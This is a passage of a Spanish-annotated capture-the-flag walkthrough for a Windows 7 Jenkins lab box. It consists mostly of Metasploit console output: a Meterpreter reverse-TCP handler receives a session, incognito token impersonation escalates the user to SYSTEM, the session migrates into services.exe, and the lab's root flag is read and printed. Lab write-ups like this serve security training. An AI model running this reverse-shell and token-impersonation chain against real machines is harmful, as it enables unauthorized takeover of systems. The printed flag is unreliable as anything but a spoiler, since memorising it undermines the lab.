9 exploit/windows/browser/ms13_080_cdisplaypointer 2013-10-08 normal No MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free
10 exploit/multi/http/maracms_upload_exec 2020-08-31 excellent Yes MaraCMS Arbitrary PHP File Upload
11 exploit/windows/mssql/mssql_linkcrawler 2000-01-01 great No Microsoft SQL Server Database Link Crawling Command Execution
12 exploit/windows/browser/persits_xupload_traversal 2009-09-29 excellent No Persits XUpload ActiveX MakeHttpRequest Directory Traversal
13 exploit/linux/http/rconfig_ajaxarchivefiles_rce 2020-03-11 good Yes Rconfig 3.x Chained Remote Code Execution
14 auxiliary/dos/http/webrick_regex 2008-08-08 normal No Ruby WEBrick::HTTP::DefaultFileHandler DoS
15 auxiliary/dos/http/squid_range_dos 2021-05-27 normal No Squid Proxy Range Header DoS
16 exploit/linux/http/trendmicro_websecurity_exec 2020-06-10 excellent Yes Trend Micro Web Security (Virtual Appliance) Remote Code Execution
17 exploit/multi/http/wp_ait_csv_rce 2020-11-14 excellent Yes WordPress AIT CSV Import Export Unauthenticated Remote Code Execution
18 exploit/linux/local/yum_package_manager_persistence 2003-12-17 excellent No Yum Package Manager Persistence
Interact with a module by name or index. For example info 18, use 18 or use exploit/linux/local/yum_package_manager_persistence
msf6 > use 5
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > set LHOST 10.10.143.22
LHOST => 10.10.143.22
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.143.22 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.143.22:4444
[*] Sending stage (175686 bytes) to 10.10.60.152
[*] Meterpreter session 1 opened (10.10.143.22:4444 -> 10.10.60.152:49204) at 2024-01-22 01:51:49 +0000
meterpreter >
CARGAMOS EL MODULO O EXTENSION DE METERPRETER INCOGNITO CON LOAD; PARA PODER VER LOS TOKENS DISPONIBLES Y MAS:
meterpreter > load incognito
Loading extension incognito...Success.
meterpreter > sysinfo
Computer : ALFRED
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > list_tokens -g
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
Delegation Tokens Available
========================================
\
BUILTIN\Administrators
BUILTIN\Users
NT AUTHORITY\Authenticated Users
NT AUTHORITY\NTLM Authentication
NT AUTHORITY\SERVICE
NT AUTHORITY\This Organization
NT AUTHORITY\WRITE RESTRICTED
NT SERVICE\AppHostSvc
NT SERVICE\AudioEndpointBuilder
NT SERVICE\BFE
NT SERVICE\CertPropSvc
NT SERVICE\CscService
NT SERVICE\Dnscache
NT SERVICE\eventlog
NT SERVICE\EventSystem
NT SERVICE\FDResPub
NT SERVICE\iphlpsvc
NT SERVICE\LanmanServer
NT SERVICE\MMCSS
NT SERVICE\PcaSvc
NT SERVICE\PlugPlay
NT SERVICE\RpcEptMapper
NT SERVICE\Schedule
NT SERVICE\SENS
NT SERVICE\SessionEnv
NT SERVICE\Spooler
NT SERVICE\sppsvc
NT SERVICE\swprv
NT SERVICE\TrkWks
NT SERVICE\TrustedInstaller
NT SERVICE\UmRdpService
NT SERVICE\UxSms
NT SERVICE\WinDefend
NT SERVICE\Winmgmt
NT SERVICE\WSearch
NT SERVICE\wuauserv
Impersonation Tokens Available
========================================
NT AUTHORITY\NETWORK
NT SERVICE\AudioSrv
NT SERVICE\DcomLaunch
NT SERVICE\Dhcp
NT SERVICE\DPS
NT SERVICE\lmhosts
NT SERVICE\MpsSvc
NT SERVICE\netprofm
NT SERVICE\nsi
NT SERVICE\PolicyAgent
NT SERVICE\Power
NT SERVICE\ShellHWDetection
NT SERVICE\W32Time
NT SERVICE\WdiServiceHost
NT SERVICE\WinHttpAutoProxySvc
NT SERVICE\wscsvc
EJECUTAMOS EL COMANDO CON IMPERSONATE_TOKEN PARA USAR EL TOKEN QUE VIMOS AVALIBLE DE ADMINISTRATOR Y OBTENEMOS LA ELEVACIOND E PRIVILEGIOS COMO AUTORITY SYSTEM, SE TENZO:
meterpreter > getuid
Server username: alfred\bruce
meterpreter > impersonate_token "BUILTIN\Administrators"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
TRATAMOS DE MIGRARA A UN PROCESO DE SYSTEM PARA ASEGURARNOS DE LOS PERMISOSO DE PRIVILEGIOS COMPLETOS POR EL MANEJO DE TOKEN DEL SISTEMA POR AHI NO PODEMOS TENER LOS PRIVILEGIOS TOTALES HASTA MIGRARA A UN PROCESO ACTUAL EJECUTADO POR SYSTEMA:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
396 4 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe
468 2440 shell-paimon.exe x86 0 alfred\bruce C:\Program Files (x86)\Jenkins\
shell-paimon.exe
524 516 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
572 564 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
580 516 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe
608 564 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.ex
e
668 580 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.ex
e
676 580 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
684 580 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe
712 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
772 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
848 668 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
920 608 LogonUI.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\LogonUI.exe
936 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
988 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1012 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1016 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1064 668 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1208 668 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1236 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1340 668 amazon-ssm-agent. x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\SSM\ama
exe zon-ssm-agent.exe
1396 524 conhost.exe x64 0 alfred\bruce C:\Windows\System32\conhost.exe
1420 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1444 668 LiteAgent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Xentool
s\LiteAgent.exe
1472 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1608 668 jenkins.exe x64 0 alfred\bruce C:\Program Files (x86)\Jenkins\
jenkins.exe
1692 668 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1700 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1804 1608 java.exe x86 0 alfred\bruce C:\Program Files (x86)\Jenkins\
jre\bin\java.exe
1832 668 Ec2Config.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Ec2Conf
igService\Ec2Config.exe
1920 524 conhost.exe x64 0 alfred\bruce C:\Windows\System32\conhost.exe
2288 1804 powershell.exe x86 0 alfred\bruce C:\Windows\SysWOW64\WindowsPowe
rShell\v1.0\powershell.exe
2340 772 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\wbem\WmiPrv
SE.exe
2440 1804 powershell.exe x86 0 alfred\bruce C:\Windows\SysWOW64\WindowsPowe
rShell\v1.0\powershell.exe
2664 524 conhost.exe x64 0 alfred\bruce C:\Windows\System32\conhost.exe
2720 668 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\SearchIndex
er.exe
2980 668 TrustedInstaller. x64 0 NT AUTHORITY\SYSTEM C:\Windows\servicing\TrustedIns
exe taller.exe
3036 668 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\sppsvc.exe
3064 2288 powershell.exe x86 0 alfred\bruce C:\Windows\SysWOW64\WindowsPowe
rShell\v1.0\powershell.exe
meterpreter > migrate 668
[*] Migrating from 468 to 668...
[*] Migration completed successfully.
meterpreter > sysinfo
Computer : ALFRED
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter > guid
[+] Session GUID: 75f4399d-ba28-41ef-96bd-bca59d2c3d40
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
BUSCAMOS LA BANDERA ROOT.TXT Y LUEGO NOS PASAMOS A SHELL COMUN PARA PODER LEERLA y SE TENZO DE NUEVO:
meterpreter > search -f root.txt
Found 1 result...
=================
Path Size (bytes) Modified (UTC)
---- ------------ --------------
c:\Windows\System32\config\root.txt 70 2019-10-26 11:36:00 +0000
meterpreter > shell
Process 2876 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>type C:\Windows\System32\config\root.txt
type C:\Windows\System32\config\root.txt
dff0f748678f280250f25a45b8046b4a